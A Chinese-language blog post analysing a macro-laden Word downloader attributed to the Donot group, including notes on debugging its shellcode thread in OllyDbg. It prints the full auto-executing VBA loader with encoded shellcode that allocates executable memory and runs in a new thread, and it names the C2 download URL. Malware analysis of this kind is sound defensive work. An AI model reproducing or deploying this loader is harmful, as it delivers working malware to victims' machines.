avatar

目录
OD调试宏代码中的新线程

donot - fees_10_to_12-copy.doc - 7a6559ff13f2aecd89c64c1704a68588

基本信息

File Name File Size File Type MD5
fees_10_to_12-copy.doc 46,119 Bytes Downloader 7a6559ff13f2aecd89c64c1704a68588

样本是一个带有宏代码的.doc文档,文档内无诱饵内容,代码部分被加密

样本分析

donot - fees_10_to_12-copy.doc

将宏代码提取后:

vbscript
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#If VBA7 Then
Private Declare PtrSafe Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As LongPtr, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function JiJJJJLjIiLiliLl Lib "kernelbase" Alias "CreateRemoteThread" (ByVal Zopqva As Long, ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function liljJjliiJIiiilL Lib "kernel32" Alias "VirtualAlloc" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function JlljIIIiILjliJJj Lib "kernel32" Alias "RtlMoveMemory" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#End If

Sub iIljILiiJILLlljL()
Dim jLlJLiiLjliLIIiL As Variant, ILlIjjlLJJJJlJIJ As Variant, IiJlLIlJIjIJJIiI As Variant, JlLiLJjLjiJlllIi As Long
#If VBA7 Then
Dim iIJIllLIliILJIll As LongPtr, jJjjJILLLJjijjjj As LongPtr, lljIJiiiIIjJjiIj As LongPtr
#Else
Dim iIJIllLIliILJIll As Long, jJjjJILLLJjijjjj As Long, lljIJiiiIIjJjiIj As Long
#End If

jLlJLiiLjliLIIiL = Array(137, 255, 85, 137, 229, 85, 131, 236, 64, 217, 235, 155, 217, 116, 36, 244, 93, 131, 237, 9, 141, 77, 37, 186, 188, 3, 0, 0, 246, 17, 128, 49, 253, 65, 74, 117, 247, 51, 203, 186, 50, 2, 2, 2, 102, 137, 54, 3, 137, 116, 14, 137, 116, 30, 137, 92, 10, 137, 124, 34, 137, 52, 130, 125, 12, 48, 119, 240, 139, 220, 235, 133, 2, 2, 2, 98, 139, 255, 139, 241, 84, 137, 113, 62, 137, 118, 28, 122, 3, 220, 84, 137, 116, 34, 3, 220, 51, 203, 75, 131, 119, 2, 209, 194, 175, 184, 67, 175, 3, 218, 84, 51, 244, 13, 188, 18, 58, 212, 118, 10, 195, 204, 5, 3, 212, 66, 233, 243, 59, 119, 2, 92, 119, 230, 88, 139, 221, 137, 88, 38, 3, 249, 100, 137, 14, 73, 137, 88, 30, 3, 249, 137, 6, 137, 3, 250, 139, 71, 2, 92, 129, 199, 6, 129, 127, 2, 2, 119, 167, 99, 193, 130, 58, 234, 118, 13, 130, 58, 235, 118, 8, 130, 58, 206, 118, 7, 130, 58, 233, 119, 19, 131, 122, 7, 146, 146, 146, 146, 118, 10, 139, _
253, 87, 139, 231, 143, 66, 7, 253, 226, 104, 2, 104, 2, 139, 229, 197, 5, 182, 155, 113, 166, 234, 106, 253, 253, 253, 104, 66, 106, 2, 50, 2, 2, 106, 2, 2, 82, 2, 104, 2, 253, 21, 129, 198, 10, 139, 197, 197, 69, 6, 227, 182, 62, 180, 197, 69, 10, 146, 124, 3, 99, 197, 69, 38, 53, 233, 59, 125, 197, 69, 34, 60, 109, 80, 12, 197, 69, 42, 61, 95, 240, 28, 197, 69, 26, 129, 23, 52, 115, 197, 69, 14, 66, 240, 75, 44, 197, 69, 18, 232, 32, 210, 59, 197, 69, 22, 21, 79, 176, 204, 197, 69, 30, 134, 164, 162, 71, 197, 69, 46, 128, 237, 13, 185, 197, 69, 50, 94, 48, 183, 217, 197, 69, 54, 74, 69, 36, 93, 197, 69, 58, 131, 60, 8, 98, 197, 69, 62, 127, 219, 196, 49, 197, 69, 66, 104, 181, 10, 187, 197, 69, 70, 99, 244, 160, 171, 197, 69, 74, 220, 177, 180, 69, 197, 5, 182, 155, 113, 166, 197, 69, 78, 158, 120, 242, 113, 197, 69, 82, 35, 243, 227, 141, 197, 69, 86, 168, 77, 99, 216, _
234, 183, 252, 253, 253, 234, 43, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 73, 103, 112, 108, 103, 110, 49, 48, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 106, 109, 108, 2, 2, 106, 119, 112, 110, 111, 143, 6, 38, 82, 253, 85, 6, 129, 198, 10, 139, 196, 197, 69, 98, 81, 20, 0, 34, 197, 69, 102, 161, 125, 107, 231, 85, 143, 125, 98, 234, 85, 252, 253, 253, 93, 234, 37, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 87, 112, 110, 111, 109, 108, 34, 68, 119, 108, 97, 118, 107, 109, 108, 113, 34, 80, 103, 113, 109, 110, 116, 103, 102, 2, 253, 85, 82, 51, 194, 143, 143, 99, 1, 2, 2, 143, 93, 110, 82, 82, 104, 125, 81, 83, 82, 253, 85, 102, 129, 250, 2, 13, 135, 246, 2, 2, 2, 234, 45, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 81, 103, 97, 109, 108, _
102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 2, 253, 85, 82, 51, 194, 82, 104, 3, 104, 1, 82, 104, 3, 106, 2, 2, 2, 130, 81, 253, 85, 14, 82, 143, 157, 238, 2, 2, 2, 104, 2, 143, 22, 38, 104, 2, 80, 106, 2, 82, 2, 2, 81, 82, 253, 85, 70, 129, 198, 6, 90, 82, 253, 85, 30, 139, 220, 244, 20, 130, 52, 60, 68, 131, 60, 90, 137, 135, 59, 119, 240, 130, 57, 146, 118, 66, 130, 57, 206, 118, 57, 130, 57, 139, 118, 52, 234, 46, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 233, 54, 234, 40, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, _
81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 253, 85, 82, 253, 225, 234, 31, 2, 2, 2, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 56, 34, 71, 122, 107, 118, 107, 108, 101, 34, 86, 106, 112, 103, 99, 102, 44, 2, 253, 85, 82, 129, 198, 62, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 107, 97, 109, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)
ILlIjjlLJJJJlJIJ = Array(144, 85, 72, 137, 229, 85, 72, 129, 236, 128, 0, 0, 0, 232, 0, 0, 0, 0, 93, 72, 131, 237, 18, 72, 141, 77, 47, 72, 199, 194, 76, 4, 0, 0, 246, 17, 128, 49, 253, 72, 255, 193, 72, 255, 202, 117, 243, 103, 78, 137, 6, 39, 98, 2, 2, 2, 79, 137, 66, 26, 79, 143, 98, 18, 79, 137, 6, 38, 254, 75, 137, 122, 98, 136, 69, 12, 62, 48, 118, 10, 79, 137, 2, 79, 59, 226, 119, 239, 75, 137, 114, 50, 233, 125, 83, 80, 81, 87, 84, 85, 74, 139, 255, 74, 139, 241, 84, 137, 113, 62, 137, 182, 28, 138, 2, 2, 2, 74, 3, 220, 84, 137, 116, 34, 74, 3, 220, 74, 51, 203, 74, 253, 203, 131, 119, 2, 209, 194, 175, 184, 253, 195, 175, 74, 3, 218, 84, 74, 51, 244, 13, 188, 18, 58, 212, 118, 8, 195, 204, 5, 3, 212, 74, 253, 194, 233, 237, 59, 119, 2, 92, 119, 221, 88, 74, 139, 221, 137, 88, 38, 74, 3, 249, 100, 137, 14, 73, 137, 88, 30, 74, 3, 249, 137, 6, 137, 74, 3, 250, 74, 139, _
71, 2, 92, 74, 129, 199, 10, 129, 127, 2, 2, 119, 147, 93, 92, 95, 89, 88, 91, 193, 104, 2, 104, 2, 74, 139, 229, 197, 5, 182, 155, 113, 166, 234, 109, 253, 253, 253, 74, 129, 238, 34, 74, 197, 195, 2, 2, 2, 2, 74, 197, 192, 2, 2, 82, 2, 75, 197, 194, 2, 50, 2, 2, 75, 197, 195, 66, 2, 2, 2, 253, 21, 74, 129, 198, 34, 74, 129, 198, 18, 74, 139, 197, 197, 5, 182, 155, 113, 166, 197, 69, 10, 227, 182, 62, 180, 197, 69, 18, 207, 102, 203, 87, 197, 69, 26, 66, 240, 75, 44, 197, 69, 34, 134, 164, 162, 71, 197, 69, 42, 94, 48, 183, 217, 197, 69, 50, 99, 244, 160, 171, 197, 69, 58, 35, 243, 227, 141, 234, 4, 253, 253, 253, 74, 137, 13, 74, 137, 93, 10, 74, 59, 219, 126, 7, 74, 43, 219, 233, 4, 74, 43, 219, 74, 245, 211, 74, 131, 251, 2, 50, 5, 2, 126, 110, 74, 51, 194, 74, 253, 194, 100, 131, 62, 1, 2, 193, 119, 247, 74, 129, 194, 6, 74, 137, 30, 1, 100, 129, 225, _
2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 66, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 197, 1, 2, 2, 2, 2, 104, 2, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 219, 74, 197, 192, 2, 19, 2, 2, 75, 197, 194, 34, 2, 2, 2, 75, 139, 195, 253, 85, 18, 74, 129, 198, 34, 90, 74, 186, 119, 112, 110, 111, 109, 108, 2, 2, 82, 74, 143, 6, 38, 74, 129, 238, 34, 74, 139, 195, 253, 85, 10, 74, 129, 198, 34, 74, 129, 198, 10, 74, 139, 196, 197, 69, 74, 81, 20, 0, 34, 197, 69, 82, 161, 125, 107, 231, 85, 74, 143, 125, 74, 234, 60, 252, 253, 253, 93, 66, 130, 230, 242, 74, 143, 135, 249, 1, 2, 2, 74, 143, 93, 98, 74, 129, 238, 50, 74, 197, 195, 2, 2, 2, 2, 74, 139, 192, 75, 139, 218, 75, 197, 195, 125, 2, 2, 2, 74, 197, 70, 38, 34, 2, 2, 2, 2, 74, 197, 70, 38, 42, 2, 2, 2, _
2, 253, 85, 82, 74, 129, 198, 50, 74, 129, 250, 2, 13, 135, 132, 3, 2, 2, 74, 129, 238, 66, 74, 139, 219, 74, 184, 2, 2, 2, 130, 2, 2, 2, 2, 75, 197, 194, 3, 2, 2, 2, 75, 197, 195, 2, 2, 2, 2, 74, 197, 70, 38, 34, 1, 2, 2, 2, 74, 197, 70, 38, 42, 3, 2, 2, 2, 74, 197, 70, 38, 50, 2, 2, 2, 2, 253, 85, 26, 74, 129, 198, 66, 82, 74, 143, 157, 226, 2, 2, 2, 104, 2, 78, 143, 22, 38, 74, 129, 238, 50, 74, 139, 195, 74, 139, 216, 75, 197, 194, 2, 82, 2, 2, 79, 139, 211, 74, 197, 70, 38, 34, 2, 2, 2, 2, 253, 85, 50, 74, 129, 198, 50, 74, 129, 198, 10, 90, 74, 129, 238, 34, 74, 139, 195, 253, 85, 34, 74, 129, 198, 34, 66, 130, 230, 242, 74, 129, 238, 34, 233, 54, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, _
103, 34, 70, 109, 117, 108, 110, 109, 99, 102, 103, 102, 44, 2, 74, 143, 15, 199, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 74, 139, 220, 244, 20, 130, 52, 60, 74, 253, 196, 131, 60, 90, 137, 135, 59, 119, 242, 130, 57, 146, 118, 86, 130, 57, 206, 118, 77, 130, 57, 74, 118, 72, 66, 130, 230, 242, 74, 129, 238, 34, 233, 50, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 75, 108, 116, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 203, 253, 253, 253, 253, 85, 58, 74, 129, 198, 34, 233, 74, 66, 130, 230, 242, 74, 129, 238, 34, 233, 44, 68, 107, 112, 113, 118, 34, 81, 118, 99, 101, 103, 34, 122, 52, 54, 56, 34, 84, 99, 110, 107, 102, 34, 81, 103, 97, 109, 108, 102, 34, 81, 118, 99, 101, 103, 34, 81, 106, 103, 110, 110, 97, 109, 102, 103, 2, 74, 143, 15, 201, 253, 253, 253, 253, _
85, 58, 74, 129, 198, 34, 253, 225, 74, 131, 198, 138, 2, 2, 2, 95, 203, 193, 106, 118, 118, 114, 56, 45, 45, 97, 99, 97, 106, 103, 114, 99, 101, 103, 44, 107, 97, 119, 45, 115, 119, 103, 103, 108, 45, 82, 78, 73, 55, 119, 109, 116, 86, 115, 70, 114, 105, 64, 105, 69, 74, 108, 49, 52, 54, 111, 115, 101, 84, 67, 68, 59, 55, 50, 102, 106, 76, 44, 114, 108, 101, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2)

#If Win64 Then
IiJlLIlJIjIJJIiI = ILlIjjlLJJJJlJIJ
#Else
IiJlLIlJIjIJJIiI = jLlJLiiLjliLIIiL
#End If

iIJIllLIliILJIll = liljJjliiJIiiilL(0, UBound(IiJlLIlJIjIJJIiI), &H1000, &H40)
For JlLiLJjLjiJlllIi = LBound(IiJlLIlJIjIJJIiI) To UBound(IiJlLIlJIjIJJIiI)
jJjjJILLLJjijjjj = IiJlLIlJIjIJJIiI(JlLiLJjLjiJlllIi)
lljIJiiiIIjJjiIj = JlljIIIiILjliJJj(iIJIllLIliILJIll + JlLiLJjLjiJlllIi, jJjjJILLLJjijjjj, 1)
Next JlLiLJjLjiJlllIi
lljIJiiiIIjJjiIj = JiJJJJLjIiLiliLl(-1, 0, 0, iIJIllLIliILJIll, 0, 0, 0);创建新线程

End Sub

Sub AutooPEN()
iIljILiiJILLlljL
End Sub
Sub WOrkBook_OPen()
iIljILiiJILLlljL
End Sub

通过阅读宏代码,得知样本的大意为硬编码的数据,解密出一段Shellcode并在自身中创建新线程执行

在创建线程的地方下断,“iIJIllLIliILJIll”为新线程函数地址,通过调试得到这次的内存地址为”322371584”,转为HEX为”1337 0000”

这里创建新线程后,代码进入了新线程内,Office内的调试器不能调试,OD忽略所有异常然后附加进程”WINWORD.exe”,跳转前面的函数地址,来到写入的Shellcode地址,修改EIP到代码起始位置,开始调试

New Thread

解密算法:

解密获取到VirtualAlloc的地址并调用,申请一块内存,通过硬编码写入数据,再次解密出需要使用的函数地址

尝试从C2地址下载文件”http://cachepage.icu/queen/PLK5uovTqDpkBkGHn364mqgVAF950dhN.ico"

截至分析时,下载的文件已失效

文章作者: Yenn_
文章链接: https://0xdf1001f.github.io/2021/02/23/OD%E8%B0%83%E8%AF%95%E5%AE%8F%E4%BB%A3%E7%A0%81%E4%B8%AD%E7%9A%84%E6%96%B0%E7%BA%BF%E7%A8%8B/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Wei's Blog

评论